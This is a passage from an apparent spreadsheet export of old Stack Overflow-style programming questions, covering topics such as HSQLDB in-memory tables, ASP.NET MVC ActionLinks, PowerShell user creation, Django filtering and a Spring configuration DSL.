&lt;p&gt;I need to apply some simple SQL techniques to three CSV files downloaded via the web, then create some DTOs which I can then use with some existing code to process them some more, and save them via REST. I don't really want to mess around with databases but the CSV files are linked by foreign keys, so I was thinking of using an in-memory embedded database to do the work, then throw the whole lot away.&lt;/p&gt;
&lt;p&gt;I had in mind a command line app working like this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a fresh database in HSQLDB.&lt;/li&gt;
&lt;li&gt;Start three HTTP GETs in three
threads using Apache HttpClient.&lt;/li&gt;
&lt;li&gt;Import the CSVs into three HSQLDB
MEMORY tables.&lt;/li&gt;
&lt;li&gt;Run some SQL.&lt;/li&gt;
&lt;li&gt;Parse the results into my existing
DTOs.&lt;/li&gt;
&lt;li&gt;Etc...&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I could use pointers to code and utilities helpful for items 1, and 3. Also is there an alternative to HSQLDB I should consider?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActionLinks doesn't always work in FireFox and Safari</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been learning the new ASP.NET MVC framwork lately and I've developed a test site for a friend who runs a "light cafÃ©" in Sweden. The plan is to release it within a week or so after performing some final adjustments and fixing some security issues. &lt;/p&gt;
&lt;p&gt;Yesterday I published the site to a webhost running IIS 6, so the first thing I had to do was to fix the issue of the extensionless URLs. I did this with the help from Phil Haack's blog post &lt;a href="http://haacked.com/archive/2008/11/26/asp.net-mvc-on-iis-6-walkthrough.aspx" rel="nofollow"&gt;ASP.NET MVC on IIS 6 Walkthrough&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;Now I have run into another issue that works well in IE7 but not in Firefox 3 and Safari.&lt;/p&gt;
&lt;p&gt;On the site I use a master page containing a "left content" with a menu. The menu consists of ActionLinks. The problem is that only the first (topmost) link works as a link, the others only look like links but they're unclickable. When I view the source everything looks good.&lt;/p&gt;
&lt;p&gt;Has anyone come across a solution that fixes this, or do you maybe know what can cause this behavior? The link to the demo site is &lt;a href="http://www.tarsius.se" rel="nofollow"&gt;Demo site&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Help would be greatly appreciated since I want this to work on all browsers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create local user with PowerShell (Windows Vista)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've installed PowerShell recently and one of the first things I started looking for was how to create a new user. After looking for some time I still haven't found this.
I have a little experience in bash on linux and find it very effective. Creating users there is trivial.
Is there an easy\built-in way to create a local user with PowerShell?&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>using (Fluent) NHibernate with StructureMap (or any IoCC)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my quest to learn NHibernate I have reached the next hurdle; how should I go about integrating it with StructureMap?&lt;/p&gt;
&lt;p&gt;Although code examples are very welcome, I'm more interested in the general procedure.&lt;/p&gt;
&lt;p&gt;What I was planning on doing was...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use Fluent NHibernate to create my class mappings for use in NHibs Configuration&lt;/li&gt;
&lt;li&gt;Implement ISession and ISessionFactory&lt;/li&gt;
&lt;li&gt;Bootstrap an instance of my ISessionFactory into StructureMap as a singleton&lt;/li&gt;
&lt;li&gt;Register ISession with StructureMap, with per-HttpRequest caching&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, don't I need to call various tidy-up methods on my session instance at the end of the HttpRequest (because thats the end of its life)?&lt;/p&gt;
&lt;p&gt;If i do the tidy-up in Dispose(), will structuremap take care of this for me?&lt;/p&gt;
&lt;p&gt;If not, what am I supposed to do?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Andrew&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Intersection of two lines defined in (rho/theta ) parameterization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have created a c++ implementation of the Hough transform for detecting lines in images. Found lines are represented using rho, theta, as described on wikipedia:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"The parameter r represents the distance between the line and the origin, while Î¸ is the angle of the vector from the origin to this closest point "&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How can i find the intersection point in x, y space for two lines described using r, Î¸?&lt;/p&gt;
&lt;p&gt;For reference here are my current functions for converting in and out of hough space:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//get 'r' (length of a line from pole (corner, 0,0, distance from center) perpendicular to a line intersecting point x,y at a given angle) given the point and the angle (in radians)
inline float point2Hough(int x, int y, float theta) {
    return((((float)x)*cosf(theta))+((float)y)*sinf(theta));
}
//get point y for a line at angle theta with a distance from the pole of r intersecting x? bad explanation! &amp;gt;_&amp;lt;
inline float hough2Point(int x, int r, float theta) {
    float y;
    if(theta!=0) {
            y=(-cosf(theta)/sinf(theta))*x+((float)r/sinf(theta));
    } else {
            y=(float)r; //wth theta may == 0?!
    }
    return(y);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;sorry in advance if this is something obvious..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any plugin framework for Java Applets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a large Java application that run as applet or Java Web Start. And it grow more and more. Typical a user need only a small part of the classes. Because Java does not know which class can it found in which jar file that it load all jar files until it find the class. If it will load a class that not exist (for example a resource bundle) then it load all jar files. This reduce the start time on a small bandwidth very large.&lt;/p&gt;
&lt;p&gt;Is there a small framework with which we can load the plugins only if needed? Or better if needed and on background?&lt;/p&gt;
&lt;p&gt;Of course the framework should not delay the start time self with it large size.&lt;/p&gt;
&lt;p&gt;I think it should use a URLClassLoader for downloading.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>flex 3 and acessing remote java objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;im just starting to learn flex and im trying to understand how Flex does remoting? From what i have read it looks like Flex provides a LifeCycle data services war which sits on your server and intercepts your remote calls , is this close?&lt;/p&gt;
&lt;p&gt;Im concerned that if i use this option that 1. Ill have to add an extra war to my server - the lifecycle data service war and 2. That i will have to pay for a license for each instance i use on each cpu.&lt;/p&gt;
&lt;p&gt;Is there an easier [free] option out there which i can use to call my remote java objects from within my flex mxml?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight button style how to prevent the focused state when the button is pressed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my custom button I need to show that it had  focus(provides some tactile feel to tabbing to the button) and show that its pressed but what I have found  is my focused state is displaying rather then my pressed state.  How can I correct this.  I would like to have mouse over to pressed not mouse over then focused(when the button is clicked )&lt;/p&gt;
&lt;p&gt;Here is a sample of my control template.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;UserControl.Resources&amp;gt;
	&amp;lt;Style x:Key="GavelButtonStyle" TargetType="Button"&amp;gt;
		&amp;lt;Setter Property="Template"&amp;gt;
			&amp;lt;Setter.Value&amp;gt;
				&amp;lt;ControlTemplate TargetType="Button"&amp;gt;
					&amp;lt;Grid Background="#FF000000" x:Name="grid"&amp;gt;
						&amp;lt;vsm:VisualStateManager.VisualStateGroups&amp;gt;
							&amp;lt;vsm:VisualStateGroup x:Name="FocusStates"&amp;gt;
								&amp;lt;vsm:VisualState x:Name="Unfocused"/&amp;gt;
								&amp;lt;vsm:VisualState x:Name="Focused"&amp;gt;
									&amp;lt;Storyboard&amp;gt;
										&amp;lt;ColorAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="image" Storyboard.TargetProperty="(UIElement.OpacityMask).(SolidColorBrush.Color)"&amp;gt;
											&amp;lt;SplineColorKeyFrame KeyTime="00:00:00" Value="#FFFFFFFF"/&amp;gt;
										&amp;lt;/ColorAnimationUsingKeyFrames&amp;gt;
										&amp;lt;ColorAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="grid" Storyboard.TargetProperty="(Panel.Background).(SolidColorBrush.Color)"&amp;gt;
											&amp;lt;SplineColorKeyFrame KeyTime="00:00:00" Value="#FF2844B9"/&amp;gt;
										&amp;lt;/ColorAnimationUsingKeyFrames&amp;gt;
									&amp;lt;/Storyboard&amp;gt;
								&amp;lt;/vsm:VisualState&amp;gt;
							&amp;lt;/vsm:VisualStateGroup&amp;gt;
							&amp;lt;vsm:VisualStateGroup x:Name="CommonStates"&amp;gt;
								&amp;lt;vsm:VisualStateGroup.Transitions&amp;gt;
									&amp;lt;vsm:VisualTransition GeneratedDuration="00:00:00.2000000"/&amp;gt;
								&amp;lt;/vsm:VisualStateGroup.Transitions&amp;gt;
								&amp;lt;vsm:VisualState x:Name="MouseOver"&amp;gt;
									&amp;lt;Storyboard&amp;gt;
										&amp;lt;DoubleAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="image" Storyboard.TargetProperty="(UIElement.RenderTransform).(TransformGroup.Children)[0].(ScaleTransform.ScaleX)"&amp;gt;
											&amp;lt;SplineDoubleKeyFrame KeyTime="00:00:00" Value="1.5"/&amp;gt;
										&amp;lt;/DoubleAnimationUsingKeyFrames&amp;gt;
										&amp;lt;DoubleAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="image" Storyboard.TargetProperty="(UIElement.RenderTransform).(TransformGroup.Children)[0].(ScaleTransform.ScaleY)"&amp;gt;
											&amp;lt;SplineDoubleKeyFrame KeyTime="00:00:00" Value="1.5"/&amp;gt;
										&amp;lt;/DoubleAnimationUsingKeyFrames&amp;gt;
									&amp;lt;/Storyboard&amp;gt;
								&amp;lt;/vsm:VisualState&amp;gt;
								&amp;lt;vsm:VisualState x:Name="Normal"/&amp;gt;
								&amp;lt;vsm:VisualState x:Name="Pressed"&amp;gt;
									&amp;lt;Storyboard&amp;gt;
										&amp;lt;DoubleAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="image" Storyboard.TargetProperty="(UIElement.RenderTransform).(TransformGroup.Children)[0].(ScaleTransform.ScaleX)"&amp;gt;
											&amp;lt;SplineDoubleKeyFrame KeyTime="00:00:00" Value="0.5"/&amp;gt;
										&amp;lt;/DoubleAnimationUsingKeyFrames&amp;gt;
										&amp;lt;DoubleAnimationUsingKeyFrames BeginTime="00:00:00" Duration="00:00:00.0010000" Storyboard.TargetName="image" Storyboard.TargetProperty="(UIElement.RenderTransform).(TransformGroup.Children)[0].(ScaleTransform.ScaleY)"&amp;gt;
											&amp;lt;SplineDoubleKeyFrame KeyTime="00:00:00" Value="0.5"/&amp;gt;
										&amp;lt;/DoubleAnimationUsingKeyFrames&amp;gt;
									&amp;lt;/Storyboard&amp;gt;
								&amp;lt;/vsm:VisualState&amp;gt;
								&amp;lt;vsm:VisualState x:Name="Disabled"/&amp;gt;
							&amp;lt;/vsm:VisualStateGroup&amp;gt;
						&amp;lt;/vsm:VisualStateManager.VisualStateGroups&amp;gt;
						&amp;lt;Image Cursor="Hand" x:Name="image" RenderTransformOrigin="0.5,0.5" Source="11_64x64.png" Stretch="Fill" OpacityMask="#FF000000"&amp;gt;
							&amp;lt;Image.RenderTransform&amp;gt;
								&amp;lt;TransformGroup&amp;gt;
									&amp;lt;ScaleTransform/&amp;gt;
									&amp;lt;SkewTransform/&amp;gt;
									&amp;lt;RotateTransform/&amp;gt;
									&amp;lt;TranslateTransform/&amp;gt;
								&amp;lt;/TransformGroup&amp;gt;
							&amp;lt;/Image.RenderTransform&amp;gt;
						&amp;lt;/Image&amp;gt;
						&amp;lt;ContentPresenter HorizontalAlignment="{TemplateBinding HorizontalContentAlignment}" VerticalAlignment="{TemplateBinding VerticalContentAlignment}"/&amp;gt;
					&amp;lt;/Grid&amp;gt;
				&amp;lt;/ControlTemplate&amp;gt;
			&amp;lt;/Setter.Value&amp;gt;
		&amp;lt;/Setter&amp;gt;
	&amp;lt;/Style&amp;gt;
&amp;lt;/UserControl.Resources&amp;gt;;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Mapping of strings to integers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the easiest way in Java to map strings (Java &lt;code&gt;String&lt;/code&gt;) to (positive) integers (Java &lt;code&gt;int&lt;/code&gt;), so that&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;equal strings map to equal integers, and&lt;/li&gt;
&lt;li&gt;different strings map to different integers?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, similar to &lt;code&gt;hashCode()&lt;/code&gt; but different strings are required to produce different integers. So, in a sense, it would be a hasCode() without the collision possibility.&lt;/p&gt;
&lt;p&gt;An obvious solution would maintain a mapping table from strings to integers,
and a counter to guarantee that new strings are assigned a new integer. I'm just wondering
how is this problem usually solved.
Would also be interesting to extend it to other objects than strings.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting MySql DateTime type into something more friendly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java web app that reads a MySql db and returns DateTime fields.  What is the best way to convert the DateTime fields returned in the resultset into something more readable?&lt;/p&gt;
&lt;p&gt;Currently the DateTime fields print as:&lt;/p&gt;
&lt;p&gt;2008-12-14 16:30:00&lt;/p&gt;
&lt;p&gt;but I would like something more user friendly like:&lt;/p&gt;
&lt;p&gt;14 Dec 2008 at 16:30&lt;/p&gt;
&lt;p&gt;I am populating an ArrayList with these dateTimes from a pojo.  I would like to format them before adding to the arrayList, so then I can just print the contents of the arrayList in the JSP.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>consume a asp.net web service that returns json from an stand alone html page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've developed a web service in asp.net and am able to test it from an in-project aspx page and can readily display the information that was returned in JSON format.&lt;/p&gt;
&lt;p&gt;I now need to consume the web service from a stand-alone html page.&lt;/p&gt;
&lt;p&gt;Does someone have experience with this?  I'm puzzled by the part that would replace this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:ScriptManager ID="ScriptManager" runat="server"&amp;gt;
	&amp;lt;Services&amp;gt;
		&amp;lt;asp:ServiceReference Path="~\MyService.asmx" /&amp;gt;
	&amp;lt;/Services&amp;gt;
&amp;lt;/asp:ScriptManager&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If this is not possible with straight html and javascript, can someone show me a stand-alone php page that would do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django objects.filter, how "expensive" would this be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to make a search view in Django. It is a search form with freetext input + some options to select, so that you can filter on years and so on. This is some of the code I have in the view so far, the part that does the filtering. And I would like some input on how expensive this would be on the database server.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;
    soknad_list = Soknad.objects.all()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if var1:
    soknad_list = soknad_list.filter(pub_date__year=var1)
if var2:
    soknad_list = soknad_list.filter(muncipality__name__exact=var2)
if var3:
    soknad_list = soknad_list.filter(genre__name__exact=var3)
# TEXT SEARCH
stop_word_list = re.compile(STOP_WORDS, re.IGNORECASE)
search_term = '%s' % request.GET['q']
cleaned_search_term = stop_word_list.sub('', search_term)
cleaned_search_term = cleaned_search_term.strip()
if len(cleaned_search_term) != 0:
    soknad_list = soknad_list.filter(Q(dream__icontains=cleaned_search_term) | Q(tags__icontains=cleaned_search_term) | Q(name__icontains=cleaned_search_term) | Q(school__name__icontains=cleaned_search_term))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;So what I do is, first make a list of all objects, then I check which variables exists (I fetch these with GET on an earlier point) and then I filter the results if they exists. But this doesn't seem too elegant, it probably does a lot of queries to achieve the result, so is there a better way to this?&lt;/p&gt;
&lt;p&gt;It does exactly what I want, but I guess there is a better/smarter way to do this. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need to re-format phone number entries in a PHP Formmail script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple text field for "Phone Number" in a contact form on a client's website. The formmail script returns whatever the user types into the field. For example, they'll receive "000-000-0000", "0000000000", (000) 000-000, etc. The client would like to receive all phone numbers in this form: 000-000-0000. Can someone provide a simple script that would strip out all extraneous punctuation, then re-insert the dashes?&lt;/p&gt;
&lt;p&gt;I'm not a programmer, just a designer so I can't provide any existing code for anyone to evaluate, though I'll be happy to email the formmail script to anyone who can help.&lt;/p&gt;
&lt;p&gt;Thanks.
A. Grant&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Private method naming convention</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a convention for naming the private method that I have called "&lt;code&gt;_Add&lt;/code&gt;" here? I am not a fan of the leading underscore but it is what one of my teammates suggests.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Vector Add(Vector vector) {
    // check vector for null, and compare Length to vector.Length
    return _Add(vector);
}
public static Vector Add(Vector vector1, Vector vector2) {
    // check parameters for null, and compare Lengths
    Vector returnVector = vector1.Clone()
    return returnVector._Add(vector2);
}
private Vector _Add(Vector vector) {
    for (int index = 0; index &amp;lt; Length; index++) {
        this[index] += vector[index];
    }
    return this;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Database Abstraction in a Reporting Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a reporting application, Is it possible to abstract reporting logic and the database schema details? &lt;/p&gt;
&lt;p&gt;I have a Reporting Services application with a reasonably complex reporting logic, I am trying to migrate the application to some other databases. (Databases that are built for the same purpose but developed by different software-houses. ) &lt;/p&gt;
&lt;p&gt;Is it a wise decision to use a web services / WCF layer in the middle? What else options can be considered?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best library for Java to grid/cluster-enable your application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is the ability to run your application on a cluster of servers with the intent to distribute the load and also provide additional redundancy.&lt;/p&gt;
&lt;p&gt;I've seen a presentation for &lt;a href="http://www.gridgain.com/"&gt;GridGain&lt;/a&gt; and I was very impressed with it.&lt;/p&gt;
&lt;p&gt;Know of any others?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add references manually</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway I can make the process of adding references to C# projects less painful?&lt;/p&gt;
&lt;p&gt;Every time I create a new C# class library project. I have to use the Add Reference dialog for 5 times at least.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Smart pointers for Windows Mobile 6 SDK</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot get std::tr1::shared_ptr for my WinMobile project since the STL for WinCE is maintained by a different team at Microsoft :( aarrgh...&lt;/p&gt;
&lt;p&gt;Anyone worked with another thread-safe, reference counting smart pointers? I'm actually using yasper which seems to be good. &lt;/p&gt;
&lt;p&gt;Thank you very much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Operator Ambiguity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Forgive me, for I am fairly new to C++, but I am having some trouble regarding operator ambiguity. I think it is compiler-specific, for the code compiled on my desktop. However, it fails to compile on my laptop. I think I know what's going wrong, but I don't see an elegant way around it. Please let me know if I am making an obvious mistake. Anyhow, here's what I'm trying to do:&lt;/p&gt;
&lt;p&gt;I have made my own vector class called Vector4 which looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Vector4
{
 private:
   GLfloat vector[4];
 ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I have these operators, which are causing the problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;operator GLfloat* () { return vector; }
operator const GLfloat* () const { return vector; }
GLfloat&amp;amp; operator [] (const size_t i) { return vector[i]; }
const GLfloat&amp;amp; operator [] (const size_t i) const { return vector[i]; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have the conversion operator so that I can pass an instance of my Vector4 class to glVertex3fv, and I have subscripting for obvious reasons. However, calls that involve subscripting the Vector4 become ambiguous to the compiler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;enum {x, y, z, w}
Vector4 v(1.0, 2.0, 3.0, 4.0);
glTranslatef(v[x], v[y], v[z]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here are the candidates:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;candidate 1: const GLfloat&amp;amp; Vector4:: operator[](size_t) const
candidate 2: operator[](const GLfloat*, int) &amp;lt;built-in&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why would it try to convert my Vector4 to a GLfloat* first when the subscript operator is already defined on Vector4? Is there a simple way around this that doesn't involve typecasting? Am I just making a silly mistake? Thanks for any help in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS "see-through" background - crazy navigation menu problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a crazy navigation menu that I have to code. It's kind of tough. Please see the screenshot of the design here:&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://i41.tinypic.com/307xfo9.png" rel="nofollow"&gt;navigation menu screenshot&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, the background of the "Home" menu item is quite tough! I can't figure out how to make its background "see-through", meaning it cuts through the dark background and shows the patterned green background.&lt;/p&gt;
&lt;p&gt;Do you know how to do this using css?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best method for paging with datagrid performance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a site with a high number of users, should paging be handled in code, or with a stored procedure.  If you have employed caching, please include your success factors.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why .NET strips off one &lt;form&gt; tag from the page if there is already a form with runat server attribute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It doesn't remove everything inside the 2nd form tag but just hides the  and  tags from the page&lt;/p&gt;
&lt;p&gt;Any ideas and workaround?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery, ThickBox with Ajax content for beginner</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is the scenario: &lt;/p&gt;
&lt;p&gt;ThickBox is opened from parent window (when button is pressed) with Ajax content (div based form) that contains the set of inputs with autocomplete support. Once ThickBox(form) is closed the input values should be passed to parent window.&lt;/p&gt;
&lt;p&gt;Question:
the content of ThickBox is loaded dynamically, so what's the correct way to have an initial callback to manipulate ThickBox content with jQuery (kind of $(ThickBox).ready.. )?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Singleton with a public (single-instance) constructor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As an exercise, I'm translating parts of our large and battle-hardened Delphi-framework to C#. &lt;/p&gt;
&lt;p&gt;Included in this framework is a generic singleton parent class. Of course, implementing a singleton in C# is fairly easy (there is even a Jon Skeet article, so what more could I wish for), but our Delphi singleton has a slightly different take on the pattern: as opposed to publishing an 'instance' property/method, it has a "fake" constructor that always returns the same instance. The essential characteristic of this approach is that the &lt;i&gt;user of the singleton class doesn't know that he is dealing with a singleton&lt;/i&gt;: 
as far as they know, they just construct any old class and request some information from it.&lt;/p&gt;
&lt;p&gt;I want to accomplish the same thing in C# (as an exercise, so it doesn't have to be production-quality code, evil hackery is fine), but so far I've failed.  &lt;/p&gt;
&lt;p&gt;Any suggestion to make a simple &lt;code&gt;myInstance = new MyClass();&lt;/code&gt; always return the same instance is most welcome! &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Additional info&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;We are talking a convenience-implementation of the singleton pattern, as offered by the framework. It doesn't necessarely have to be a parent-class, but it does have to assist the developers in creating their own singletons as well. Requiring them to manually redirect all their method calls to the single-instance will not make them overflow with joy. :-)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I'm not really interested in debating whether or not this is the right way to deal with singletons, for now I'm just interested in the finer art of c#-tweaking.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I make a generic object list work from a specific base class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;   TMyDataList&amp;lt;T: TBaseDatafile, constructor&amp;gt; = class(TObjectList&amp;lt;TBaseDatafile&amp;gt;)
   public
      constructor Create;
      procedure upload(db: TDataSet);
   end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I read in a blog post (I don't remember where now) that this is the way to declare a generic-based class with a specific base type for the generic object.  And the compiler will accept it just fine.  But when I try to use it, it decides not to cooperate.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type
   TDescendantList = TMyDataList&amp;lt;TDescendantDatafile&amp;gt;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gives me a compiler error.&lt;/p&gt;
&lt;p&gt;[DCC Error] my_database.pas(1145): E2010 Incompatible types: 'TDescendantDatafile' and 'TBaseDatafile'&lt;/p&gt;
&lt;p&gt;Thing is, 1145 isn't even a valid line.  The file in question ends at #1142, and the type declaration that it's complaining about is on line #20.  This makes me wonder if it's a compiler glitch.  Or do I just not quite have the syntax right? Does anyone know a way to make this work?&lt;/p&gt;
&lt;p&gt;EDIT: Jim pointed out that it compiles fine when he tried it.  A bit more information: I have the base datafile type and the generic list declared in the same unit, while TDescendantDatafile is in a second unit and TDescendantList is defined in a third one.  I've already found and reported one bug in D2009's compiler involving generics screwing up types across multiple units.  This may be related.  Can anyone confirm this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How-To: Copy dependent assembly in case it is not in GAC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a Setup Package using VS2008. This is a regular setup package installing a COM Add-In app for Outlook. It works Ok, so far. However I need to improve it a little...&lt;/p&gt;
&lt;p&gt;The story is that installation package copies all dependent assemblies into the installation folder of the add-in. &lt;/p&gt;
&lt;p&gt;For example, the COM Add-In depends on Microsoft.Office.Interop.Outlook.dll assembly. So installation package copies it to its' folder :)&lt;/p&gt;
&lt;p&gt;Of course, I can switch Exclude property of the Microsoft.Office.Interop.Outlook.dll dependency to True which will prevent the assembly from being copied. However, I need to achieve the following behavior:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In case Microsoft.Office.Interop.Outlook.dll is not in GAC, we simply copy it to the installation folder of the Add-In &lt;/li&gt;
&lt;li&gt;Otherwise, use the one which is in GAC&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please suggest the way ti can be done in .Net2.0?
A step by step guide will be really appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drupal How to see document attached to Node for anonymous users</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am finishing up a Drupal site and I have attached a word document on one of my page nodes. I want anonymous people to be able to download it, but they don't even see the document. I do as a logged in user.&lt;/p&gt;
&lt;p&gt;Any Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding javascript to the OnBlur property of an ASP.NET text box control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to specify some JavaScript to execute on the OnBlur event of an ASP.NET text box?  It seems to me like if I add any event handlers to the TextBox object they will just cause postbacks to the server isntead of doing what I want.  Basically, I just want to be able to have the textbox be rendered in this HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;INPUT type="text" onblur="alert('1234')" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>is SFig language syntax efficient and clear (and better than Spring-Framework's XML DSL)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;ADDENDUM EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Have not accepted an answer to this as
  there has not been any feedback from
  experienced Spring Framework
  developers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've been working on a replacement DSL to use for Spring-Framework applicationContext.xml files (where bean initialization and dependency relationships are described for loading up into the Spring bean factory).&lt;/p&gt;
&lt;p&gt;My motivation is that I just flat out don't like Spring's use of XML for this purpose nor do I really like any of the alternatives that have been devised so far. For various reasons that I won't go into, I want to stay with a declarative language and not some imperative scripting language such as Groovy.&lt;/p&gt;
&lt;p&gt;So I grabbed the ANTLR parser tool and have been devising a new bean factory DSL that I've dubbed SFig. Here's a link that talks more about that:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://dobbscodetalk.com/index.php?option=com_content&amp;amp;task=view&amp;amp;id=922&amp;amp;Itemid=85" rel="nofollow"&gt;SFigâ„¢ - alternative metadata config language for Spring-Framework&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And here is the source code repository site:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://code.google.com/p/sfig/" rel="nofollow"&gt;http://code.google.com/p/sfig/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm interested to know how I'm doing on the language syntax so far. Do you think SFig is both efficient and clear to understand? (I'm particularly concerned right now with the mulit-line text string):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;properties_include "classpath:application.properties";
org.apache.commons.dbcp.BasicDataSource dataSource {
    @scope = singleton;
    @destroy-method = close;
    driverClassName = "${jdbc.driverClassName}";
    url = "${jdbc.url}";
    username = "${jdbc.username}";
    password = "${jdbc.password}";
    defaultAutoCommit = true;
}
